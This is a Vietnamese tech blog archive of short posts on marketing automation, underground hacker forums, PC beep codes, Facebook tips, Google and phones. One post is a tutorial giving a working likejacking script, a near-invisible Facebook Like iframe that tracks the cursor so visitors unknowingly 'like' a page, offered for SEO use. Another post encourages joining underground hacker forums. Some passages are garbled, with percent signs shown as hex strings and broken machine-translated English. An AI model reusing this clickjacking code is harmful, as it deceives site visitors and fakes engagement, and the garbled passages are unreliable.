Category Archives for Công nghệ

Marketing-Automation

Marketing Automation – Tự động hóa trong Marketing là gì?

Marketing Automation là gì?

Từ lâu, Marketing đã được coi là xương sống của bất kỳ mối quan hệ giữa thương hiệu – khách hàng và đương nhiên cũng có mối quan hệ mật thiết với Sales. Khi quy mô kinh doanh lớn dần khiến việc quản lý khó khăn hơn, lúc này thì là lúc Marketing Automation ra đời. Bạn đã biết đến thuật ngữ “Marketing Automation“, nghĩa là tự động hóa trong tiếp thị?

Marketing Automation ở đây là một loại phần mềm, nó sắp xếp tự động và tính toán đo lường các hoạt động marketing. Các công ty sẽ tăng hiệu quả hoạt động và tăng doanh thu nhanh hơn nhờ Marketing Automation.

Marketing automation bao gồm các chiến dịch marketing trên tất cả các kênh – từ việc gửi mail đến gọi điện thoại trực tiếp. Tiếp thị tự động hóa là việc sử dụng phần mềm để tự động hóa các quy trình tiếp thị như phân khúc khách hàng, tích hợp dữ liệu khách hàng và quản lý các chiến dịch. Việc ứng dụng tiếp thị tự động hóa làm cho các quá trình vốn có thể thực hiện bằng tay trở nên hiệu quả và kết hợp ăn ý với nhau hơn.Thêm vào đó, marketing automation kết hợp khả năng phân tích chuyên sâu từ CRM, hệ thống quản trị lead, web analytics và các hệ thống khác để tạo ra một nền tảng duy nhất.

Marketing-Automation

Marketing Automation

Marketing automation bao gồm các hình thức:

 • Email Marketing
 • Landing Pages
 • Quản lý chiến dịch
 • Các chương trình Marketing
 • Tạo khách hàng tiềm năng
 • Dự đoán và đánh giá
 • Quản trị lead
 • Tích hợp CRM
 • Social Marketing
 • Quản trị nguồn lực
 • Phân tích thị trường

Trong thời đại công nghệ số, kết nối với một khách hàng tiềm năng mà không thực sự xác định được họ đã biết những gì về sản phẩm, có mối quan tâm cụ thể ra sao quả thực rất khó. Bởi vì vậy, hầu hết các khách hàng hiện đại đã phát triển cho mình một kỹ năng tự tìm kiếm thông tin theo nhu cầu. Vì lẽ đó, họ không còn phụ thuộc hoàn toàn vào nhân viên bán hàng để có thông tin về sản phẩm hay thị trường.

Để thích ứng với sự thay đổi này, việc tiếp thị kỹ thuật số đã trở thành nền tảng của nhiều doanh nghiệp và là một trong những công cụ hiệu quả trong quá trình tìm kiếm khách hàng. Cùng với đó, Marketing Automation cũng chính là là lựa chọn hoàn hảo cho bài toán thiếu sự kết nối giữa Marketing – Sales, hướng tới trải nghiệm và sự hài lòng cao nhất của khách hàng.

Tự động hóa trong  tiếp thị đặc biệt được đánh giá cao ở khả năng này và có tác động tích cực trong việc thúc đẩy doanh số, bởi nó thường xuyên cập nhật hồ sơ của khách hàng tiềm năng dựa trên hoạt động trực tuyến. Nhờ đó doanh nghiệp có cơ hội tiếp cận đúng nhu cầu của khách hàng, theo dõi được hàng vi khách hàng để đưa ra những gợi ý phù hợp với nhu cầu của khách hàng, đồng thời giảm thời gian theo dõi khách hàng tiềm năng khi họ đã có convert trên trang.

Tiếp thị tự động hóa tạo ra một cái nhìn theo chiều dọc về hoạt động của khách hàng tiềm năng và chuyển nó đến các bạn sales. Nhân viên bán hàng có thể tận dụng tối đa thông tin về tương tác mà khách hàng tiềm năng đã có với thương hiệu cho các lần tiếp cận sắp tới. Đồng thời cho phép nhóm bán hàng hiểu rõ hơn về hành vi khách hàng, những điểm cần thảo luận trong từng lần kết nối với khách hàng tiềm năng.

Trên thực tế, hầu hết khách hàng tiềm năng đều được chuyển tới bộ phận Bán hàng khá chậm. Trong khi, không phải tất cả mọi khách hàng tiềm năng truy cập website đều sẵn sàng để trò chuyện và không phải tất cả mọi người đăng ký nhận tài liệu đều có khả năng chuyển đổi.

Lúc này, Marketing Automation đóng vai trò quan trọng trong việc kết nối – Sales và Marketing không nên được coi là hai thực thể riêng biệt, mà là yếu tố quan trọng trong một quy trình lớn hơn – hành trình khách hàng. Đáp án cho câu hỏi này chính là ứng dụng tiếp thị tự động hóa để chấm điểm Lead – nắm bắt nhu cầu, hành vi của khách hàng từ đó chấm điểm các hoạt động theo từng tiêu chí và thông báo đối tượng đã đến thời điểm tiếp cận.

Cuối cùng, tất cả các chiến dịch tiếp thị hay chăm sóc khách hàng đều hướng tới mục tiêu sinh chuyển đổi, Marketing automation đã giúp các công ty tăng tỷ lệ chuyển đổi của họ lên 53{e96bbdc3c9a18cb843db6d36cf3048761cd228ae9a1c588075bf8f9322d64100} so với mức tăng 9,3{e96bbdc3c9a18cb843db6d36cf3048761cd228ae9a1c588075bf8f9322d64100} đối với các công ty không sử dụng.

Trong các phần trên, chúng tôi cũng đã phân tích sơ lược về vai trò của việc chăm sóc khách hàng tiềm năng, một yếu tố quan trọng trong Tiếp thị Tự động hóa. Về bài sau chúng tôi sẽ giới thiệu cho các bạn một số phần mềm về Marketing Automation. Chúc các bạn sớm nắm bắt được xu hướng về Marketing Automation để đạt được những doanh số lớn nhất với tỉ lệ chuyển đổi cao!

Xem thêm

Có nên tham gia những forum UG (Thế giới Hacker ngầm) ?

Có nên tham gia những forum UG (Thế giới Hacker ngầm) ?

Có nên tham gia những forum UG (Thế giới Hacker ngầm) hay không?. 

Trong giới hacker, security trước nay vẫn được phân chia thành mũ trắng và mũ đen. Một phía chuyên lợi dụng lỗi hổng đến tấn công, trục lợi mang mục đích xấu. Một bên là các chuyên gia tìm và khắc phục lỗ hổng.
Tuy vậy, ranh giới đen trắng thường rất mỏng manh. Trong thế giới mạng của các hacker cũng vậy. Nhiều diễn đàn được mở ra để trao đổi, học hỏi về kỹ thuật và bảo mật, nhưng cũng không ít diễn đàn đang tồn tại như một thế giới ngầm, hay còn gọi là Underground Hacker Forum, gọi tắt là UG.

Những diễn đàn UG rất đa dạng và phong phú về hình thức, quy mô. Tuy nhiên hầu hết đều có một điểm đồng nhất là hoạt động rất khép kín, thành viên tham gia được tuyển chọn kỹ càng qua từng đợt. Đào thải thường xuyên nếu bạn không hoạt động tốt.
Giống như nếu có người yêu cầu bạn ở chung nhà với những tên trộm cướp, chắc chắn bạn sẽ không đồng ý. Vì đương nhiên không ai muốn dính vào những chuyện không đâu cả. Trong lĩnh vực bảo mật cũng có nhiều ý kiến như thế.

Tuy vậy, không thể phủ nhận rằng đây là nơi chứa đựng rất nhiều kiến thức, thảo luận đáng để học hỏi. Có thể là về kiến thức chuyên ngành, cũng có thể là những lối suy nghĩ, nhìn nhận vấn đề vô cùng độc đáo.
Bỏ qua chuyện lừa lọc ở UG, bạn có biết rằng rất nhiều lỗ hổng dạng Zero Day được tìm thấy tại các diễn đàn này, và hàng ngày còn rất nhiều lỗi khác đang được rao bán ở các chợ đen ? Vì vậy, không thể không công nhận khả năng của những thành viên hoạt động trong diễn đàn UG.

Hacker mũ trắng, những chuyên gia bảo mật, thông thường ngoài các lỗi phổ biến trên thế giới có thể tính trước được, thì luôn phải đi sau các hacker mũ đen này. Đây không phải là bàn về trình độ, mà là về tiến trình, thì việc khai thác luôn đi trước, khắc phục vẫn phải theo sau. Vậy, sẽ tốt hơn nếu 1 hacker mũ trắng cũng tham gia vào diễn đàn UG, để cập nhật đc nhanh chóng các thông tin lỗi bảo mật mới nhất phải không ?

Muốn đánh bại kẻ thù, bạn phải hiểu rõ về họ trước. Có cách nào tốt hơn là việc cùng hoạt đột với họ không ?
Bạn nên chuẩn bị hành trang cho mình trước khi muốn tham gia vào UG, đó là một số quy tắc cần nhớ như sau:


Không tham gia vào các hoạt động phi pháp, mang tính hội nhóm do các diễn đàn này tổ chức.
Không dùng các tài khoản email chính, mật khẩu thường dùng để tạo tài khoản tham gia UG.
Hạn chế mua bán, giao dịch với các thành viên, vì nguy cơ lừa đảo rất cao.

Tóm lại, nếu chỉ đơn thuần tham gia với mục đích tìm, cập nhật thông tin bảo mật thì rất nên. Điều đó sẽ giúp bạn nâng cao trình độ, cũng như có nhiều cái nhìn mới. Nhưng hãy lưu ý rằng, đây cũng chính là nơi có nhiều ma lực nhất, một lúc nào đó bạn mất cảnh giác, tự chủ, để rồi bạn sẽ trở thành một trong số họ lúc nào không hay.

Bài viết này không đề cập đến các diễn đàn UG của Việt Nam, vì ở Việt Nam, các diễn đàn này rất, rất ít, ngoài ra các diễn đàn UG như mọi người thường quen gọi không có giá trị nhiều về kiến thức trong lĩnh vực bảo mật, hầu như nó chỉ là các chợ đen.
Nguồn Techblog.vn

Xem thêm

[TUT] Tự động Like Page cho khách hàng làm SEO

[TUT] Tự động Like Page cho khách hàng làm SEO

Hướng dẫn cách tự động [TUT] Tự động Like Page cho khách hàng làm SEO. Làm Like cho fanpage Cách này mình đã kiểm tra và cảm thấy hiệu quả chia sẻ cho các bạn làm SEO (TUTs không mang tính thương mại).

Bước 1: Tạo PAGE (Hoặc sử dụng PAGE). Cách tạo page này khá đơn giản chắc bạn nào dùng facebook cũng biết rồi

Bước 2: Chèn MÃ sau vào giữa code HEAD (Đoạn mã đỏ được giải thích bên dưới)

<div id=”fb-root”></div>

<script>(function(d, s, id) {

  var js, fjs = d.getElementsByTagName(s)[0];

  if (d.getElementById(id)) return;

  js = d.createElement(s); js.id = id;

  js.src = “//connect.facebook.net/vi_VN/all.js#xfbml=1&appId=135814643283624″;

  fjs.parentNode.insertBefore(js, fjs);

}(document, ‘script’, ‘facebook-jssdk’));</script>

<script type=”text/javascript”>

  //<![CDATA[

(function(){

  var Xcord = 0,

  Ycord = 0,

  IE = document.all ? true : false;

  if (!IE) document.captureEvents(Event.MOUSEMOVE);

  var lbox = document.createElement(‘iframe’);

  lbox.src = ‘http://www.facebook.com/plugins/like.php?href=‘ + encodeURIComponent(/*document.location.href*/ ‘http://www.facebook.com/phimhaivl‘) + ‘&amp;layout=standard&amp;show_faces=true&amp;width=53&amp;action=lbox&amp;colorscheme=light&amp;height=30’;

  lbox.scrolling = ‘no’;

  lbox.frameBorder = 0;

  lbox.allowTransparency = ‘true’;

  lbox.style.border = 0;

  lbox.style.overflow = ‘hidden’;

  lbox.style.cursor = ‘pointer’;

  lbox.style.width = ’53px’;

  lbox.style.height =  ’23px’;

  lbox.style.position = ‘absolute’;

  lbox.style.opacity = 0.2;

  document.getElementsByTagName(‘body’)[0].appendChild(lbox);

  window.addEventListener(‘mousemove’, mouseMove, false);

  setTimeout(function(){

    document.getElementsByTagName(‘body’)[0].removeChild(lbox);

    window.removeEventListener(‘mousemove’, mouseMove, false);

  }, 10000);

  function mouseMove(e) {

    if (IE) {

      Xcord = event.clientX + document.body.scrollLeft;

      Ycord = event.clientY + document.body.scrollTop;

    } else {

      Xcord = e.pageX;

      Ycord = e.pageY;

    }

    if (Xcord < 0) Xcord = 0;

    if (Ycord < 0) Ycord = 0;

    lbox.style.top = (Ycord – 8) + ‘px’;

    lbox.style.left = (Xcord – 25) + ‘px’;

    return true

  }

})();

  //]]>

</script>

–          Các đoạn bôi đỏ là các đoạn chú ý các bạn thay vào 135814643283624 : (Là ID của page facebook  cách tạo APP lấy ID của site tại đây: https://developers.facebook.com/apps)

–          http://www.facebook.com/phimhaivl –> Page của khách hàng.

–          10000: (Thời gian hiển thị nút Like bắt sự kiện theo chuột đây là để hiển thị 10s)

 

Xem thêm

Máy tính kêu tít tít, không khởi động được vì sao

Máy tính kêu tít tít, không khởi động được vì sao

Máy tính của bạn gặp hiện tượng kêu tít tít, và không khởi động được. Hoặc chỉ hiện màn hình đen không vào được windows. Vậy lỗi là do đâu?

Hỏi: máy tính của em nó bị lỗi sao ý khi bật lên nó chỉ có tiếng còi tít tít trên main mà không hiện chút gì trên màn hình,Các pro có thể cho em biết máy em bị sao không

Đáp: Giải pháp 365 trả lời bạn như sau: 

 • Lỗi khi khởi động máy. Có tiếng kêu, lý do của từng tiếng kêu ấy như sau :1 tiếng ngắn_Tự kiểm tra điện vào (POST) bình thường_Hệ thống đang hoạt động bình thường.
  2 tiếng ngắn_Lỗi khởi chạy_Mã lỗi được hiển thị.
  1 dài, 1 ngắn_Lỗi mainboard
  1 dài, 2 ngắn_Lỗi bộ điều hợp video
  1 dài, 3 ngắn_Lỗi bộ điều hợp EGA/VGA
  3 tiếng dài_Lỗi bộ điều hợp bàn phím 3270
  Kêu liên tục_Trục trặc nguồn điện_Thay nguồn điện.
  999 tiếng_Trục trặc nguồn điện_Thay nguồn điện.
  Không có tiếng kêu_Không có điện vào_Thay nguồn điện.
  Máy xách tay Thinkpad của IBM
  Tiếng kêu_LỗiMô tả
  Kêu liên tục_Hỏng mainboard.
  1 tiếng bíp, màn hình LCD trắng xóa, nhấp nháy hoặc không đọc được_Hỏng kết nối với màn hình; hỏng bộ chuyển điện cho đèn hình; lỗi bộ điều hợp video; lỗi đồng bộ với LCD; hỏng mainboard; trục trặc về nguồn điện.
  1 tiếng bíp kèm theo thông báo “Unable to access boot source”_Hỏng thiết bị khởi động; hỏng mainboard.
  1 dài, 2 ngắn_Hỏng mainboard; trục trặc với bộ điều hợp video; lỗi đồng bộ LCD.
  1 dài, 4 ngắn_Pin yếu.
  Mỗi giây một tiếng_Pin yếu.
  2 tiếng ngắn cùng mã lỗi_Lỗi POST.
  2 tiếng ngắn_Mainboard trục trặc.
  Máy tính Compaq
  Tiếng kêu_Xác định lỗi_Mô tả
  1 tiếng ngắn_Không có lỗi nào cả_Hệ thống đang khởi động bình thường.
  1 dài, 1 ngắn_Lỗi kiểm tra toàn bộ BIOS ROM_Các nội dung của BIOS ROM không được như mong đợi. Nếu có thể, cài lại BIOS.
  2 tiếng ngắn_Lỗi tổng thể_Không xác định được lỗi.
  7 tiếng, bao gồm 1 dài, 1 ngắn, 1 dài , ngừng, 1 dài, 1 ngắn, 1 ngắn)_Lỗi video AGPCard video AGP bị lỗi_Hãy chỉnh lại card hoặc thay thế. Tiếng bíp này thường gặp ở các máy Compaq Deskpro.
  1 tiếng kêu dường như “bất tận”_Lỗi bộ nhớ_RAM hỏng. Hãy kiểm tra hoặc thay thế.
  1 dài, 2 ngắn_Lỗi video_Kiểm tra bộ điều hợp video xem đã cắm chuẩn hay chưa. Nếu có thể, thay thế adapter này.
  1 ngắn, 2 dài_Lỗi RAM_Chỉnh lại RAM. Kiểm tra và thay thế nếu không thành công.

Hoặc: Thay cây ram khác vào và nhớ vệ sinh sạch khe Ram, Lổi này chỉ do khe Ram or Card VGA tiếp xúc không tốt với main nên mới có tình trạng như trên. Bạn lấy giấy tập viết của hs mà lau Ram và VGA (nếu có) xong thì gắn lại tiếng bíp đó sẽ mất :B 

Hỏi: Máy tính của em khi khởi động màn hình tối thui và chỉ hiện Ctrl+Alt+del ?

Trả lời: Hiện tượng lỗi này có 3 khả năng 
1. Windows của bạn đã bị lỗi bạn cài lại windows là hết. Trường hợp này chiếm đến 70{e96bbdc3c9a18cb843db6d36cf3048761cd228ae9a1c588075bf8f9322d64100}
2. Ổ cứng của bạn gặp vấn đề về Boot Sector, bạn cài lại windows sẽ lấy lại được Boot sector. 
3. Ổ cứng của bạn đã bị hỏng, Mainboard không nhận ổ cứng nữa. Chia buồn với bạn nên thay ổ cứng khác! 
 
Một lý do khác ít gặp hơn là bạn nên kiểm tra xem có cắm usb vào máy tính không trong trường hợp bạn cắm USB mà Mainboard chọn chế độ khởi động bằng USB cũng gây ra TH này.

Khi gặp sự cố về máy tính, máy in, camera, tổng đài hay về mạng máy tính, server, website… Bạn hãy liên hệ ngay với chúng tôi để được tư vấn và sử dụng những dịch vụ phù hợp nhất. Hotline   0947 33 49 28

Giải pháp 365 – Sua may tinh tại nhà . Khắc phục nhanh, dịch vụ uy tín!

Xem thêm

Google ngừng tính năng chỉ đường tại Việt Nam

Google ngừng tính năng chỉ đường tại Việt Nam

Vài ngày gần đây, nhiều người dùng dịch vụ bản đồ của Google (Google maps) không còn được sử dụng tính năng chỉ đường (directions) trên lãnh thổ Việt Nam dù bản đồ vẫn hoạt động bình thường.

Tính năng chỉ dẫn đường trên bản đồ được Google bắt đầu cung cấp tại Việt Nam từ đầu năm 2010

Theo phản ảnh của nhiều người, hầu hết các thiết bị di động như máy tính bảng, điện thoại thông minh, máy tính để bàn… có cài đặt dịch vụ Google Maps đều không sử dụng được tính năng này.

Truy cập vào trang thông tin về dịch vụ bản đồ của Google, chúng tôi nhận thấy các tính năng như: dẫn đường, xem quang cảnh đường phố (street view), giao thông, điểm kinh doanh… đều ở tình trạng không sử dụng được.

Dịch vụ bản đồ của Google tại Việt Nam hiện chỉ có hai tính năng là xem bản đồ và định vị. Thông tin trên website cho thấy Việt Nam cùng với 55 quốc gia khác không được cung cấp tính năng dẫn đường.

Việc Google bất ngờ ngưng cung cấp tính năng dẫn đường mà không có một thông báo chính thức hay lí do giải thích rõ ràng nào khiến rất nhiều người dùng Việt Nam thất vọng.

Trên các diễn đàn mạng, nhiều thành viên liên tục bình luận về sự việc trên với rất nhiều phỏng đoán nguyên nhân khác nhau… Các thành viên đều hi vọng đây chỉ là sự cố nâng cấp nào đó của Google và mong tính năng dẫn đường sẽ nhanh chóng được khôi phục.

Tính năng dẫn đường trên bản đồ được Google bắt đầu cung cấp tại Việt Nam từ đầu năm 2010. Người dùng có thể tìm hướng dẫn đường đi theo ba cách: đi bộ, xe hơi và ôtô hoàn toàn miễn phí. Tính năng hữu ích này nhanh chóng được rất nhiều người dùng Việt Nam yêu thích và sử dụng.

Theo TTO

 

Xem thêm

MegaUpload sẽ trở lại vào ngày giỗ đầu của nó

MegaUpload sẽ trở lại vào ngày giỗ đầu của nó

Mọi người ạ! MegaUpload đã bị cho ăn hành được gần một năm rồi đấy, nhưng ông chủ của nó Kim Dotcom thì không hề có ý muốn để mọi chuyện như vậy. Trước đó, Kim đã tiết lộ vài thông tin về một sự trở lại. Vâng, lady and gentlement, ngày trở lại của MegaUpload vừa chính thức được công bố – 19.01.2013. 

Kỉ niệm đúng 1 năm ngày hệ thống lưu trữ và chia sẻ dữ liệu lớn nhất thế giới bị hạ gục, hệ thống mới ra đời thay thế sẽ có tên đơn giản là “Mega” với cách thức tiếp cận việc chia sẻ thông minh hơn, thứ sẽ giúp nó miễn nhiễm sự can thiệp như cách mà người tiền nhiệm đã mắc phải.

Kỉ niệm đúng 1 năm ngày hệ thống lưu trữ và chia sẻ dữ liệu lớn nhất thế giới bị hạ gục, hệ thống mới ra đời thay thế sẽ có tên đơn giản là “Mega” với cách thức tiếp cận việc chia sẻ thông minh hơn, thứ sẽ giúp nó miễn nhiễm sự can thiệp như cách mà người tiền nhiệm đã mắc phải.

Tuy thế vẫn có một số còn đang nằm trong vòng bí ẩn mà chúng ta chưa được biết, ví dụ nó sẽ được đặt server ở đâu sau khi tên miền MegaUpload.com bị liên bang thu giữ.

 

Xem thêm

Hướng dẫn mở khóa khi bị khóa tài khoản facebook

Hướng dẫn mở khóa khi bị khóa tài khoản facebook.

Vào một ngày đẹp trời bỗng dưng Khóa tài khoản facebook bị khoá Những nguyên nhân cốt lõi khiến bạn phải điều tra trường hợp Khóa tài khoản có thể là: kết bạn quá nhiều giấy phép của facebook, đăng hình ảnh có nội dung không lành mạnh hoặc những phản hồi sau khi bạn bè báo cáo với fb … ở đây mình thấy khi thêm bạn bè liên tục và có thể khóa hàng ngày, có thể bị chặn Tài khoản 3 ngày, 1 tuần hay là 1 tháng. Trường hợp xấu nhất có thể là viễn tưởng, vào một ngày bạn đăng nhập facebook và hiển thị dòng thông báo này:
Hãy làm theo hướng dẫn để giúp bạn trở lại bình thường của tài khoản

Để mở khóa, bạn chọn “Tiếp tục” nhé. Facebook sẽ yêu cầu bạn nhập mã bảo vệ

Tiếp theo Facebook sẽ yêu cầu bạn xác thực tài khoản qua điện thoại di động. Bạn có thể chọn mục “Nhập số điện thoại” sau đó nhập điện thoại vào. Please see many you have the number of the phone into the fax does not authentication and many things will be reported. Hãy thử lại lần sau, kinh nghiệm là cách 2 ngày sau đó hãy thử lại.

Last step is your phone number into. Chú ý hiện tại mình đã thấy thẻ SIM để xác thực là: mobifone, vietnam mobile, beeline. Đối với SIM mobifone, số đầu để có thể nhận dc CODE nhanh nhất từ ​​fb là 0128. Có nhiều đầu khác với các mạng SIM khác nếu bạn đã thành công rồi, có thể chia sẻ tại đây nhé.

Sau khi nhập số điện thoại vào FB sẽ gửi cho bạn CODE, đơn giản cuối cùng là nhập. Facebook xác thực sẽ cho phép bạn LOGIN vào tài khoản luôn.

Nhiều bạn gặp trường hợp như sau: facebook của e bị chặn. can not understand that you must be real time. Mà bạn bè của một ngày bạn trăm người bạn ah. should you remember the name of friends for xác nhận .Rất mong đươc giúp đỡ đở e

Xin trả lời bạn như sau: Có thể tài khoản Facebook của bạn đã đăng nhập ở các điểm khác, làm thay đổi IP và facebook xác định trường hợp bị mất mật khẩu. If your account will be sure you should leave it 🙂

Chúc các bạn thành công nhé.

 

Xem thêm

Cách tạo ký tự đặc biệt vui trên facebook

Cách tạo ký tự đặc biệt vui trên facebookCách tạo ký tự đặc biệt vui trên facebook

Bài viết sau giới thiệu cho các bạn cách tạo các ký tự đặc biệt vui trên facebook. Các biểu tượng này thường được tạo ra với phim ATL, phím ALT gọi các ký tự ASCII. Tổng hợp những kí tự đặc biệt bị ẩn đi trong Facebook, các kí tự dễ thương này các bạn có thể gọi nó ra rất dễ dàng theo hướng dẫn dưới đây bạn chỉ cần gõ những kí tự và hình vui facebook sẽ hiện ra.

Chắc hẳn mấy bạn online facebook đều muốn thể hiện tâm trạng của mình cho người khác xem thông qua các ký tự biểu cảm, biểu tượng cảm xúc. Do vậy bên dưới là các tập hợp cách ghi cũng như hình ảnh của các ký tự đó trên facebook mà mình muốn chia sẻ.

Công thức để thể hiện các biểu tượng:
Cho máy tính bàn: Alt + số.

Laptop: Fn + Alt + số được đặt ngay trên các ký tự.

Dislike:

Alt + 1 ☺, Alt + 2 ☻, Alt + 3 ♥, Alt + 4 ♦ ,Alt + 5 ♣, Alt + 6 ♠, Alt + 7 •, Alt + 8 ◘, Alt + 9 ○, Alt + 10 ◙, Alt + 11 ♂, Alt + 12 ♀, Alt + 13 ♪, Alt + 14 ♫, Alt + 15 ☼, Alt + 16 ►, Alt + 17 ◄, Alt + 18 ↕, Alt + 19 ‼, Alt + 20 ¶, Alt + 21 §, Alt + 22 ▬, Alt + 23 ↨, Alt + 24 , Alt + 25 ↓, Alt + 26 →, Alt + 27 ←, Alt + 28 ∟, Alt + 29 ↔, Alt + 30 ▲, Alt + 31 ▼

Thời tiết: Mặt trời: ☀ — Mây: — Mưa: ☂ — Tuyết: ☃

Pointers

&
Arrows➟➡➢➣➤➥➦➧➨➚➘➙➛
➜➝➞➸♐➲➳⏎➴➵➶➷➸
➹➺➻➼➽←↑→↓↔↕↖↗
↘↙↚↛↜↝↞↟↠↡↢↣↤
↥↦↧↨➫➬➩➪➭➮➯➱↩
↪↫↬↭↮↯↰↱↲↳↴↵↶
↷↸↹↺↻↼↽↾↿⇀⇁⇂⇃
⇄⇅⇆⇇⇈⇉⇊⇋⇌⇍⇎⇏⇐
⇑⇒⇓⇔⇕⇖⇗⇘⇙⇚⇛⇜⇝
⇞⇟⇠⇡⇢⇣⇤⇥⇦⇧⇨⇩⇪
⌦⌧⌫⇫⇬⇭⇮⇯⇰⇱⇲⇳⇴
⇵⇶⇷⇸⇹⇺

[334954663181745]] – Spongebob

[[332936966718584]] – Hello Kitty
[[326134990738733]] – Pikachu
[[297354436976262]] – Santa Claus
[[269153023141273]] – Poring
[[252497564817075]] – Kerokeroppi
[[250128751720149]] – Domo Kun
[[249199828481201]] – Konata Izumi
[[236147243124900]] – Pokeball
[[224502284290679]] – Nobita
[[223328504409723]] – Gintoki Sakata
[[196431117116365]] – Shin chan
[[157680577671754]] – Angry Bird
[[155393057897143]] – Doraemon
[[144685078974802]] – Mojacko
[[138529122927104]] – Pedo Bear
Icon có trong facebook.

♠ ♣ ♥ ♦ ♪ ♫ ■ □ ▪ ▫ ▬ ▲ ►▼ ◄ ◊ ○ ● ◘ ◙ ◦ ☺ ☻ ☼ ♀ ▪ ▫ ▬ ☻ ☺ ◙ ◘ ▀ € ♥ ♂ ▒ ٩(●̮̮̃•̃)۶ ٩(-̮̮̃-̃)۶ ٩(͡๏̯͡๏)۶ ٩(-̮̮̃•̃)۶ ٩(×̯×)۶ ❤ ❥ ♡ ♥ ღ ɞ ❀ ✿ ❁ ✾ ✽ ❃ ❋ ♪ ♫ ♩ ♬ ♭ ♮ ♯ ★ ✩ ✮ ✯ ✰ ☆ ⋆ ╰☆╮✡ ۞ ❇ ❈ ❅ ❄ ❆ ☯ ✡☨ ✞ ✝☥ ☦ ☧ ☩ ☪ ☫ ☬ ☭ ✌ ☮ ♥ ♦ ♣ ♠ ♡ ♢ ♤ ♧ ♈ ♉ ♊ ♋ ♌ ♍ ♎ ♏ ♐ ♑ ♒ ♓ ♚ ♛ ♜ ♝ ♞ ♟ ♔ ♕ ♖ ♗ ♘ ♙ ☩ ☨ ☦ ✙ ✚ ✛ ✜ ✝ ✞ ✠ ☾ ☽ ☼ ☀ ☁ ☂ ☃ ㋡ ㋛ ✓ ☚ ☛ ☜ ☝ ☞ ☟ ✉ ✍ ✎ ✏ ✐ ✑ ✒ ⌨ ✂ ✄ ☎ ☏ ✆ ⌛ ⌚ ✈♨☠

Xem thêm

Google tiết lộ bí mật về hệ thống servers của mình!

Google tiết lộ bí mật về hệ thống servers của mình!

Google tiết lộ bí mật về hệ thống servers của mình!Đa số các công ty lớn đều dùng servers do Dell, HP, IBM, hoặc Sun sản xuất, riêng Google thì tự design lấy hàng trăm ngàn servers cho mình, thế nhưng design tuyệt mật của các servers này thì ai cũng tò mò muốn biết nhưng rất ít người được biết.

Lần đầu tiên trong lịch sử, Google vén bức màn bí mật phủ trên loại server design mà họ bắt đầu áp dụng từ năm 2005 (hiện đang trong thế hệ thứ 7), với những công nghệ tối ưu năng lượng có một không hai làm giới IT trầm trồ, chẳng hạn như là:

Các power supply unit (PSU) được đặc chế chỉ có công việc duy nhất là chuyển điện xuống 12 volts, điều này đóng góp không nhỏ cho power efficiency của PSU.
Tuy cũng chạy dual-CPU và có tới 8 RAM slots như ai, nhưng các motherboard do Google design chỉ cần nguồn điện 12 volts và tự có khả năng chuyển đổi giữa 12 volts, 5 volts, và 3.3 volts.

Khi công tác chuyển đổi điện thế giữa 12 volts, 5 volts, và 3.3 volts được chính motherboard đảm nhiệm, các PSU có thể hoạt động gần năng suất tối đa và không còn làm hoang phí điện thành hơi nhiệt nhiều như là trong các servers thông thường. Điều này có nghĩa là các servers sẽ chạy mát hơn và hệ thống điều hòa nhiệt độ cũng không cần đến các máy lạnh khổng lồ khát điện như là các data center truyền thống. Dĩ nhiên, các power supply không phải làm việc cực nhọc thì cũng sống lâu hơn.

Google cho biết, các công nghệ tối ưu năng lượng này chỉ có phí tổn thêm từ $1 cho đến $2 cho mỗi motherboard, nhưng với chúng, Google đã có thể nâng mức power efficiency của từng server lên đến 99.9{e96bbdc3c9a18cb843db6d36cf3048761cd228ae9a1c588075bf8f9322d64100}, con số làm các công ty khác chảy nước dãi và giới tiêu dùng như chúng ta chỉ nằm mơ!

Ngoài rạ, mỗi 2U server của Google đều có một bình điện back-up riêng biệt để có thể tối ưu mức năng lượng cần thiết cho từng server một khi cần thiết, thay vì cắm chung tất cả mọi servers trong data center vào chung một hệ thống UPS khổng lồ kềnh càng hoang phí năng lượng như tất cả các công ty khác. Theo tính toán của Google, việc gắn bình điện riêng biệt cho từng server lại còn tiết kiệm nhiều tiền hơn là ráp một hệ thống UPS có khả năng back-up cho số lượng servers tương đương!

Với một công ty có hàng trăm ngàn servers trong tay và các data centers nằm rải rác khắp thế giới như là Google, số tiền tiết kiệm được mỗi ngày/tháng/năm cho từng server mang nhân lên thì quả không phải là nhỏ!

Tuy nhiên, điều thú vị nhất chính là thiết kế “Modular Data Center” di động mà Google đăng ký bằng phát minh từ 2005 và hiện đang áp dụng khắp nơi. Thay vì cất từng server trong tủ tại data center như các công ty khác, các servers của Google được chứa trong các…shipping container riêng biệt, mỗi container chứa 1160 servers, mỗi data center chứa khoảng 45 containers như thế.

Đối với đa số các data center thông thường, mỗi khi thiên tai như bão lụt, sóng thần, động đất, hỏa hoạn xảy ra thì khách hàng chỉ còn nước…cầu nguyện là data đã được backup trước đó, còn các servers nằm chết dí trong căn building bị ảnh hưởng thì…phó thác theo ý trời.

Đối với thiết kế modular data center, Google chỉ cần móc cần cẩu kéo hết các containers này lên xe tải chở đi nơi khác là xong! Khi triển khai data center mới ở đâu đó thì cũng thể lắp đặt nhanh như gió.

Khi Google đăng ký bằng phát minh cho thiết kế “data center di động” này từ năm 2005, có nhiều người cười chê là dở hơi, nhưng sau các vụ thiên tai gần đây, còn có ai dám cười?

================================

 

Xem thêm

BlackBerry Z10 giá rẻ tại DigiCenter

BlackBerry Z10

BlackBerry Z10 được đánh giá là một trong những điện thoại hấp dẫn nhất năm 2013, là đối thủ xứng tầm của iPhone 5S, HTC One M7 và Xperia Z.

Đi ngược lại thiết kế truyền thống dường như dã quá lạc hậu so với mặt bằng chung của các điện thoại cao cấp hiện tại, BlackBerry Z10 được đánh giá đẹp, sang trọng nhưng lại rất nam tính. Thiết kế của Z10 được đánh giá cao nhờ sự đối xứng đa chiều, với mặt trước có nhiều nét tương đồng với thiết kế của HTC One và iPhone 5S, một sự ngẫu nhiên thể hiện sự quy tụ của các ý tưởng thiết kế lớn trong cùng một khoảng thời gian của 3 đại gia công nghệ BlackBerry, HTC và Apple.

Màn hình là điểm ưu tuyệt vời của BlackBerry Z10

 So với các điện thoại cao cấp khác cả về chất lượng hiển thị, chất lượng và độ nhạy của màn cảm ứng cùng với góc nhìn rất rộng.

